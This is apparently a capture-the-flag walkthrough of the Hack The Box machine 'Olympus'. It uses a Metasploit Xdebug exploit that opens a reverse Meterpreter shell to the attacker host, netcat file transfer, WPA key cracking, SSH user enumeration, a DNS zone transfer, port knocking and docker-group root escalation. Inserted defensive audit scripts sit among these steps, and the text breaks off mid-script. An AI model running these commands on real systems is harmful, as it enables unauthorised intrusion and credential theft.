Olympus
Starting with a port scan.
root@n0w4n:~# nmap -v -n -T4 -sS -sV -sC -oN ~/htb/olympus/scan.nmap -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:06 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
53/tcp   open     domain  (unknown banner: Bind)
| dns-nsid: 
|_  bind.version: Bind
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    Bind
80/tcp   open     http    Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-City of olympia
| ssh-hostkey: 
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)

NSE: Script Post-scanning.
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.53 seconds
           Raw packets sent: 66614 (2.931MB) | Rcvd: 65711 (2.628MB)
So SSH port 22 is filtered, which usually means the packets are dropped (by a firewall).
There is an open port 2222 with an SSH server behind it.
There is also a webserver running on port 80 and finally a DNS server behind port 53.
With these results there are a few things off.
First port 22, which I already mentioned.
Also DNS is mostly UDP, and if TCP port 53 is open for DNS it's mostly there for zone transfers (link).
On port 80 an Apache webserver is running, but unfortunately it doesn't leak a version number.
There are a few DNS recon tools, but Kali has dnsrecon installed by default, which can scan a nameserver and try to find any registered subdomains.
It can take a while, so I'll run it in the background with a for loop.
root@n0w4n:~/htb/olympus# for DOMAIN in 10.0.0.0/8 172.16.0.0/16 192.168.0.0/24; do dnsrecon -n 10.10.10.83 -r $DOMAIN --db dns_database; done
On the website there is not that much. Just a picture.
root@n0w4n:~/htb/olympus# curl -v 10.10.10.83
*   Trying 10.10.10.83...
* TCP_NODELAY set
* Connected to 10.10.10.83 (10.10.10.83) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.83
> User-Agent: curl/7.62.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 04 Dec 2018 19:12:46 GMT
< Server: Apache
< Vary: Accept-Encoding
< X-Content-Type-Options: nosniff
< X-Frame-Options: sameorigin
< X-XSS-Protection: 1; mode=block
< Xdebug: 2.5.5
< Content-Length: 314
< Content-Type: text/html; charset=UTF-8
< 
<!DOCTYPE HTML>
<html>
<head>
<title>Crete island - Olympus HTB</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link rel="shortcut icon" href="favicon.ico">
<link rel="stylesheet" type="text/css" href="crete.css">
</head>
<body class="crete">
</body>
* Connection #0 to host 10.10.10.83 left intact
root@n0w4n:~/htb/olympus# wget 10.10.10.83/zeus.jpg
--2018-12-04 20:11:29--  http://10.10.10.83/zeus.jpg
Connecting to 10.10.10.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 37144 (36K) [image/jpeg]
Saving to: ‘zeus.jpg’

zeus.jpg       100%[====================================================================================================================>]  36.27K  --.-KB/s    in 0.07s

2018-12-04 20:11:30 (540 KB/s) - ‘zeus.jpg’ saved [37144/37144]
When I check it with exiftool and hexdump there is nothing odd about it. Why did I download the image?
In some CTFs there are comments placed in the metadata of an image, or the image is used for steganography.
No comments here, so I'll hang on to it in case there is a hint about steganography or something.
In the curl output there is another thing that stands out: Xdebug: 2.5.5
After some googling it looks like Xdebug is an extension for PHP to assist with debugging and development. It contains a single step debugger to use with IDEs (link).
Another hit that came up was for the use of a metasploit module.
msf > use exploit/unix/http/xdebug_unauth_exec
msf exploit(unix/http/xdebug_unauth_exec) > options

Module options (exploit/unix/http/xdebug_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /index.php       yes       Path to target webapp
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       Callback host for accepting connections
   SRVPORT  9000             yes       Port to listen for the debugger
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
rhost => 10.10.10.83
msf exploit(unix/http/xdebug_unauth_exec) > set lhost tun0
lhost => tun0
msf exploit(unix/http/xdebug_unauth_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.83:80 - Waiting for client response.
[*] 10.10.10.83:80 - Receiving response
[*] 10.10.10.83:80 - Shell might take upto a minute to respond.Please be patient.
[*] 10.10.10.83:80 - Sending payload of size 2026 bytes
[*] Sending stage (38247 bytes) to 10.10.10.83
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.83:51148) at 2018-12-04 20:25:05 +0100
id

meterpreter > 
meterpreter > sysinfo
Computer    : f00ba96171c5
OS          : Linux f00ba96171c5 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
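What makes that module work is the server-side Xdebug configuration, which the writeup never shows: in Xdebug 2.x, xdebug.remote_enable=1 together with xdebug.remote_connect_back=1 makes PHP open a DBGp debugger connection back to whichever client sent the request (on xdebug.remote_port, 9000 by default, which is why the module listens on SRVPORT 9000). The shell function below is an added example, not part of the original writeup, that flags that combination in a php.ini fragment so it is caught before a host goes live. The directive names are real Xdebug 2 settings; the ini text is constructed.

```shell
#!/usr/bin/env bash
# Added example: audit a php.ini fragment for the Xdebug 2.x settings that let
# an unauthenticated HTTP client pull the debugger back to its own host.
# Reads ini text on stdin; prints findings; exit status 0 = risky, 1 = not.

xdebug_risky_settings() {
  local cfg enable=0 connect_back=0
  # Drop ';' comments, trailing/leading blanks and empty lines, and normalise
  # "key = value" to "key=value" so the anchored greps below are exact.
  cfg=$(sed -e 's/;.*$//' \
            -e 's/[[:space:]]*$//' \
            -e 's/[[:space:]]*=[[:space:]]*/=/' \
            -e 's/^[[:space:]]*//' \
            -e '/^$/d')
  if printf '%s\n' "$cfg" | grep -qiE '^xdebug\.remote_enable=(1|on|true)$'; then
    enable=1
    echo "xdebug.remote_enable is on"
  fi
  if printf '%s\n' "$cfg" | grep -qiE '^xdebug\.remote_connect_back=(1|on|true)$'; then
    connect_back=1
    echo "xdebug.remote_connect_back is on (debugger follows the client IP of every request)"
  fi
  if [ "$enable" -eq 1 ] && [ "$connect_back" -eq 1 ]; then
    echo "RISKY: any client that can reach this vhost can become the debugger"
    return 0
  fi
  echo "not flagged: remote_connect_back is off (still check that xdebug.remote_host is a developer machine)"
  return 1
}

# Constructed sample: a development php.ini left on an internet-facing host.
SAMPLE_INI='[xdebug]
xdebug.remote_enable = 1
xdebug.remote_connect_back = 1   ; lets the requester choose the debug host
xdebug.remote_port = 9000'

printf '%s\n' "$SAMPLE_INI" | xdebug_risky_settings
```

Run it against each php.ini, conf.d fragment and php-fpm pool file, because these directives can be set in any of them; on a production host the right state is xdebug not loaded at all.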
I’ll jump onto the machine.
cd /
ls -lah
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   1 root root 4.0K Apr  8  2018 bin
drwxr-xr-x   2 root root 4.0K Jul 13  2017 boot
drwxr-xr-x   5 root root  340 Dec  3 05:13 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Apr  8  2018 lib
drwxr-xr-x   2 root root 4.0K Oct  9  2017 lib64
drwxr-xr-x   2 root root 4.0K Oct  9  2017 media
drwxr-xr-x   2 root root 4.0K Oct  9  2017 mnt
drwxr-xr-x   2 root root 4.0K Oct  9  2017 opt
dr-xr-xr-x 164 root root    0 Dec  3 05:13 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  1  2017 run
drwxr-xr-x   1 root root 4.0K Apr  8  2018 sbin
drwxr-xr-x   2 root root 4.0K Oct  9  2017 srv
dr-xr-xr-x  13 root root    0 Dec  3 05:13 sys
drwxrwxrwt   1 root root 4.0K Apr  8  2018 tmp
drwxr-xr-x   1 root root 4.0K Oct  9  2017 usr
drwxr-xr-x   1 root root 4.0K Dec  1  2017 var
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
7: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:14:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.2/16 brd 172.20.255.255 scope global eth0
       valid_lft forever preferred_lft forever
It looks like I’m in a docker environment.
ls -lah /home
total 12K
drwxr-xr-x 1 root root 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 zeus
ls -lah /home/zeus
total 12K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 airgeddon
ls -lah /home/zeus/airgeddon
total 1.1M
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus  264 Apr  8  2018 .editorconfig
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .git
-rw-r--r-- 1 zeus zeus  230 Apr  8  2018 .gitattributes
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .github
-rw-r--r-- 1 zeus zeus   89 Apr  8  2018 .gitignore
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 CHANGELOG.md
-rw-r--r-- 1 zeus zeus 3.2K Apr  8  2018 CODE_OF_CONDUCT.md
-rw-r--r-- 1 zeus zeus 6.3K Apr  8  2018 CONTRIBUTING.md
-rw-r--r-- 1 zeus zeus 3.3K Apr  8  2018 Dockerfile
-rw-r--r-- 1 zeus zeus  35K Apr  8  2018 LICENSE.md
-rw-r--r-- 1 zeus zeus 4.4K Apr  8  2018 README.md
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 airgeddon.sh
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 binaries
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 captured
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 imgs
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 known_pins.db
-rw-r--r-- 1 zeus zeus 670K Apr  8  2018 language_strings.sh
-rw-r--r-- 1 zeus zeus   33 Apr  8  2018 pindb_checksum.txt
cd /home/zeus/airgeddon/captured
ls -lah
total 304K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 captured.cap
-rw-r--r-- 1 zeus zeus   57 Apr  8  2018 papyrus.txt
cat papyrus.txt
Captured while flying. I'll banish him to Olympia - Zeus
Let’s get the file over to my local machine
root@n0w4n:~/htb/olympus# nc -lp 9999 > captured.cap
nc -w3 10.10.14.8 9999 < captured.cap
And it's sent.
root@n0w4n:~/htb/olympus# file captured.cap
captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)
Opening the file with wireshark
SSID…..looks like WiFi.
Let’s check the wireless LAN option.
CCMP……looks like it is a WPA key.
A good way to crack a WPA key is with hashcat. Unfortunately I run Kali in a VM and it doesn’t like hashcat very much.
That’s why I use a somewhat older method with aircrack-ng.
root@n0w4n:~/htb/olympus# aircrack-ng -w /usr/share/wordlists/rockyou.txt captured.cap

      [00:22:04] 5306000/9822768 keys tested (4211.03 k/s)

      Time left: 17 minutes, 52 seconds                      54.02%

                           KEY FOUND! [ flightoficarus ]

      Master Key     : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
                       88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48

      Transient Key  : 20 05 27 E1 73 E0 73 F5 F1 2D AF D1 17 8B F8 27
                       C6 BE 23 E3 70 8A EF AE 6D 0C 89 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
For this brute-force attempt I use the favorite CTF wordlist……rockyou.txt
Another method is to use John the Ripper, but then you need to convert the cap file into a hccap file and then into a format John can digest (can be done with hccap2john).
As I now have the WPA key I can decrypt the traffic.
The capture file has over 6000 packets, so there are a few things that can be done to filter it.
First there is the Statistics option with Protocol Hierarchy. With this you can see all the protocols used and get an overview of what to focus on.
Also I can use a display filter to filter out unwanted packets. In this case I use the 'ip' filter so I see all the IP traffic and nothing else.
Unfortunately I can't find anything useful in this capture file other than the cracked password. The password itself may be the final objective of this capture file.
So maybe password reuse?
ss -tupan
Netid State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
udp   UNCONN     0      0      127.0.0.11:57019     *:*
tcp   LISTEN     0      128    *:80                 *:*
tcp   LISTEN     0      128    127.0.0.11:43929     *:*
tcp   CLOSE-WAIT 0      0      172.20.0.2:51942     10.10.14.8:9000   users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13),("sh",pid=21,fd=13))
tcp   ESTAB      0      432    172.20.0.2:39186     10.10.14.8:5555   users:(("ss",pid=27,fd=14),("sh",pid=22,fd=14),("sh",pid=21,fd=14))
Nothing interesting is listening on this machine. So I go back to my local machine and try SSH on port 2222 with the found username zeus and password flightoficarus.
root@n0w4n:~/htb/olympus# ssh zeus@10.10.10.83 -p 2222
zeus@10.10.10.83's password: 
Permission denied, please try again.
Not working. Maybe not the right username or password. Metasploit has an SSH enumeration module.
For this to work I need a list of usernames, and this machine has a clear theme.
I found a site with a nice list of the gods, but it's not a straight list to download. Normally you can use a tool called CeWL to generate wordlists from websites, but because there is so much text on this site it's better to do it manually.
For this I found a website with a lot of names and copied the content into a file. Then I trim the file a bit to be of better use to metasploit.
root@n0w4n:~/htb/olympus# cat gods.list | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > list.gods
As a check I also put in root as a user, because in most cases root is a valid username.
msf auxiliary(scanner/ssh/ssh_enumusers) > options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting          Required  Description
   ----         ---------------          --------  -----------
   CHECK_FALSE  false                    no        Check for false positives (random username)
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.83              yes       The target address range or CIDR identifier
   RPORT        2222                     yes       The target port
   THREADS      1                        yes       The number of concurrent threads
   THRESHOLD    10                       yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                              no        Single username to test (username spray)
   USER_FILE    ~/htb/olympus/list.gods  no        File containing usernames, one per line

Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet

msf auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.10.10.83:2222 - SSH - Using malformed packet technique
[*] 10.10.10.83:2222 - SSH - Starting scan
[+] 10.10.10.83:2222 - SSH - User 'root' found
[-] 10.10.10.83:2222 - SSH - User 'acestes' not found
..... [SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'iasion' not found
[+] 10.10.10.83:2222 - SSH - User 'icarus' found
[-] 10.10.10.83:2222 - SSH - User 'idomeneus' not found
..... [SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'zeus' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So there is a username other than root: icarus
That makes sense as the SSID was Too_cl0se_to_th3_Sun.
root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password: 
Permission denied, please try again.
“flightoficarus” is not working? After some pondering I tried the SSID (because it was leet) and that worked as a password.
root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password: 
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$ 
icarus@620b296204a3:~$ ls -lah
total 32K
drwxr-xr-x 1 icarus icarus 4.0K Apr 15  2018 .
drwxr-xr-x 1 root   root   4.0K Apr  8  2018 ..
-rw------- 1 icarus icarus   33 Apr 15  2018 .bash_history
-rw-r--r-- 1 icarus icarus  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 icarus icarus 3.7K Aug 31  2015 .bashrc
drwx------ 2 icarus icarus 4.0K Apr 15  2018 .cache
-rw-r--r-- 1 icarus icarus  655 May 16  2017 .profile
-rw-r--r-- 1 root   root     85 Apr 15  2018 help_of_the_gods.txt
icarus@620b296204a3:~$ cat help_of_the_gods.txt
Athena goddess will guide you through the dark...

Way to Rhodes...
ctfolympus.htb
Still no user.txt
I guess I’m still not the user intended to find the first hash.
I got a hostname and a mention of Athena as a goddess. But this username was already in my list, so that's not a username for this box.
icarus@620b296204a3:~$ ls -lah /
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   2 root root 4.0K Feb 28  2018 bin
drwxr-xr-x   2 root root 4.0K Apr 12  2016 boot
drwxr-xr-x   5 root root  340 Dec  4 19:51 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Sep 13  2015 lib
drwxr-xr-x   2 root root 4.0K Feb 28  2018 lib64
drwxr-xr-x   2 root root 4.0K Feb 28  2018 media
drwxr-xr-x   2 root root 4.0K Feb 28  2018 mnt
drwxr-xr-x   2 root root 4.0K Feb 28  2018 opt
dr-xr-xr-x 160 root root    0 Dec  4 19:51 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  5 08:08 run
drwxr-xr-x   1 root root 4.0K Mar  6  2018 sbin
drwxr-xr-x   2 root root 4.0K Feb 28  2018 srv
dr-xr-xr-x  13 root root    0 Dec  4 19:51 sys
drwxrwxrwt   1 root root 4.0K Apr  3  2018 tmp
drwxr-xr-x   1 root root 4.0K Feb 28  2018 usr
drwxr-xr-x   1 root root 4.0K Feb 28  2018 var
I’m in another docker.
When I try to enumerate this machine I notice there are almost no tools installed.
From the initial nmap scan I know that there is a nameserver running, but back then I had no domain name.
Let's try a zone transfer with dig.
root@n0w4n:~/htb/olympus# dig @10.10.10.83 ctfolympus.htb -t AXFR

; <<>> DiG 9.11.5-1-Debian <<>> @10.10.10.83 ctfolympus.htb -t AXFR
; (1 server found)
;; global options: +cmd
ctfolympus.htb.         86400   IN      SOA     ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.         86400   IN      TXT     "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb.         86400   IN      A       192.168.0.120
ctfolympus.htb.         86400   IN      NS      ns1.ctfolympus.htb.
ctfolympus.htb.         86400   IN      NS      ns2.ctfolympus.htb.
ctfolympus.htb.         86400   IN      MX      10 mail.ctfolympus.htb.
crete.ctfolympus.htb.   86400   IN      CNAME   ctfolympus.htb.
hades.ctfolympus.htb.   86400   IN      CNAME   ctfolympus.htb.
mail.ctfolympus.htb.    86400   IN      A       192.168.0.120
ns1.ctfolympus.htb.     86400   IN      A       192.168.0.120
ns2.ctfolympus.htb.     86400   IN      A       192.168.0.120
rhodes.ctfolympus.htb.  86400   IN      CNAME   ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT     "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb.     86400   IN      CNAME   ctfolympus.htb.
ctfolympus.htb.         86400   IN      SOA     ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 30 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Wed Dec 05 09:24:01 CET 2018
;; XFR size: 15 records (messages 1, bytes 475)
Some comments:
“prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”
RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”
The first one again has a leet-speak string, which looks like a password, and three numbers.
The three numbers and the reference to something temporal have port knocking written all over them.
There are several ways to knock on a port. You can use nmap, telnet, netcat or, as I'm doing, knock (you need knockd installed for this).
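The zone transfer above only worked because the BIND container answers AXFR for anyone; on a real server the fix is an allow-transfer { ...; }; clause listing only the secondaries (or none), and the matching detection is to watch BIND's xfer-out log category. The script below is an added example, not part of the original writeup: it pulls every outbound AXFR out of BIND log lines and reports the clients that are not on a known-secondary list. The log format is assumed from BIND 9's "transfer of 'zone/IN': AXFR started" messages, and the sample lines are constructed (192.168.0.120 is ns2 in the zone above; 10.10.14.8 stands in for an unknown requester).

```shell
#!/usr/bin/env bash
# Added example: spot outbound zone transfers in BIND's xfer-out log and flag
# any client that is not one of our known secondaries. The message format is
# assumed from BIND 9; the sample log below is constructed, not from the box.

# Print "client_ip zone" for every AXFR the server started, deduplicated.
# Handles both "client 1.2.3.4#port" and the newer "client @0x... 1.2.3.4#port".
axfr_clients() {
  sed -nE "s|.*client (@0x[0-9a-f]+ )?([0-9A-Fa-f.:]+)#[0-9]+ .*transfer of '([^'/]+)/IN': AXFR started.*|\2 \3|p" | sort -u
}

# Usage: unexpected_axfr <allowed_secondary_ip>... < named.log
# Prints the same "client_ip zone" pairs, minus clients on the allow list.
unexpected_axfr() {
  local allowed=" $* "
  axfr_clients | while read -r ip zone; do
    case "$allowed" in
      *" $ip "*) ;;                        # a secondary we expect
      *) printf '%s %s\n' "$ip" "$zone" ;; # anyone else copied the zone
    esac
  done
}

# Constructed sample log: one legitimate secondary and one transfer pulled by
# an unknown host. In real use: unexpected_axfr 192.168.0.120 < /var/log/named.log
SAMPLE_LOG=$(cat <<'EOF'
04-Dec-2018 19:07:01.101 xfer-out: info: client @0x7f0c1c0a5d10 192.168.0.120#40012 (ctfolympus.htb): transfer of 'ctfolympus.htb/IN': AXFR started (serial 2018042301)
04-Dec-2018 19:07:01.104 xfer-out: info: client @0x7f0c1c0a5d10 192.168.0.120#40012 (ctfolympus.htb): transfer of 'ctfolympus.htb/IN': AXFR ended
05-Dec-2018 09:24:01.457 xfer-out: info: client 10.10.14.8#58214 (ctfolympus.htb): transfer of 'ctfolympus.htb/IN': AXFR started
05-Dec-2018 09:24:01.460 xfer-out: info: client 10.10.14.8#58214 (ctfolympus.htb): transfer of 'ctfolympus.htb/IN': AXFR ended
EOF
)

printf '%s\n' "$SAMPLE_LOG" | unexpected_axfr 192.168.0.120
```

Anything this prints is a full copy of the zone, including TXT records like the one above, handed to a host you did not configure as a secondary; with allow-transfer in place the same attempt shows up as a refused transfer instead.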
root@n0w4n:~/htb/olympus# knock 10.10.10.83 3456 8234 62431
root@n0w4n:~/htb/olympus# nmap -n -T4 -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 09:43 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 40.38 seconds
Another port scan reveals port 22 to be open.
root@n0w4n:~/htb/olympus# ssh prometheus@10.10.10.83
The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@10.10.10.83's password: 
Welcome to
) ( ( /( ) )\ ) ( )\()) ( /( (()/( ))\ ( ((_)\ )(_)) ((_))/((_))\ | |(_)((_)_ _| |(_)) ((_) | ' \ / _` |/ _` |/ -_)(_-< |_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$ 
prometheus@olympus:~$ ls -lah ~
total 28K
drwxr-xr-x 2 prometheus prometheus 4.0K Apr  8  2018 .
drwxr-xr-x 3 root       root       4.0K Apr  4  2018 ..
-rw------- 1 root       root          0 Apr  8  2018 .bash_history
-rw-r--r-- 1 prometheus prometheus  220 Apr  2  2018 .bash_logout
-rw-r--r-- 1 prometheus prometheus 3.6K Apr  4  2018 .bashrc
-rw-r----- 1 root       prometheus  248 Apr  8  2018 msg_of_gods.txt
-rw-r--r-- 1 prometheus prometheus  675 Apr  2  2018 .profile
-rw-r----- 1 root       prometheus   33 Apr  4  2018 user.txt
prometheus@olympus:~$ cat ~/user.txt
[no spoilers]
Finally………the first flag.
Now on to getting root.
prometheus@olympus:~$ ip a | grep inet
    inet 127.0.0.1/8 scope host lo
    inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-0a8ad598ebee
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2668d8e07649
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-c8834ba5f981
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
prometheus@olympus:~$ ls -lah /
total 84K
drwxr-xr-x  22 root root 4.0K Apr  2  2018 .
drwxr-xr-x  22 root root 4.0K Apr  2  2018 ..
drwxr-xr-x   2 root root 4.0K Apr 15  2018 bin
drwxr-xr-x   3 root root 4.0K Apr 15  2018 boot
drwxr-xr-x  17 root root 3.1K Dec  4 12:50 dev
drwxr-xr-x  85 root root 4.0K Apr 15  2018 etc
drwxr-xr-x   3 root root 4.0K Apr  4  2018 home
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img -> boot/initrd.img-4.9.0-6-amd64
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64
drwxr-xr-x  16 root root 4.0K Apr  2  2018 lib
drwxr-xr-x   2 root root 4.0K Apr  2  2018 lib64
drwx------   2 root root  16K Apr  2  2018 lost+found
drwxr-xr-x   3 root root 4.0K Apr  2  2018 media
drwxr-xr-x   2 root root 4.0K Apr  2  2018 mnt
drwxr-xr-x   2 root root 4.0K Apr  2  2018 opt
dr-xr-xr-x 167 root root    0 Dec  4 12:50 proc
drwx------   4 root root 4.0K Apr 15  2018 root
drwxr-xr-x  17 root root  600 Dec  5 01:28 run
drwxr-xr-x   2 root root 4.0K Apr 15  2018 sbin
drwxr-xr-x   2 root root 4.0K Apr  2  2018 srv
dr-xr-xr-x  13 root root    0 Dec  5 01:13 sys
drwxrwxrwt   9 root root 4.0K Dec  5 01:38 tmp
drwxr-xr-x  10 root root 4.0K Apr  2  2018 usr
drwxr-xr-x  11 root root 4.0K Apr  2  2018 var
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz -> boot/vmlinuz-4.9.0-6-amd64
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64
I’m not in a docker anymore.
prometheus@olympus:~$ id
uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker)
Looks like I don't have sudo, but I am a member of the docker group, which gives the opportunity to elevate rights: being a member of the docker group is the same as giving a user full root access to the system (link).
The way I'm going to get root is to bind-mount the host's root folder into a container. The steps and explanation can be found here.
Docker has a very useful help function: give it a subcommand and add --help and you get a list of the possibilities for that subcommand.
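Because docker group membership is root-equivalent, the thing to audit on a host like this is who is in that group at all. The shell script below is an added example (not from the writeup) that lists every account that can reach the Docker socket through the group, whether by supplementary membership in /etc/group or by having the docker GID as primary group in /etc/passwd, and fails unless each one is on an explicit allow list. The group and passwd files it reads here are constructed samples; the account names other than prometheus are made up.

```shell
#!/usr/bin/env bash
# Added example: find every account with docker-group access, by supplementary
# membership (/etc/group) or by primary GID (/etc/passwd). Each name that is
# not a dedicated service account is effectively root on the host.

# Usage: docker_group_members GROUP_FILE PASSWD_FILE  -> sorted usernames
docker_group_members() {
  awk -F: '
    FNR == NR {                            # first file: the group file
      if ($1 == "docker") {
        gid = $3
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") seen[m[i]] = 1
      }
      next
    }
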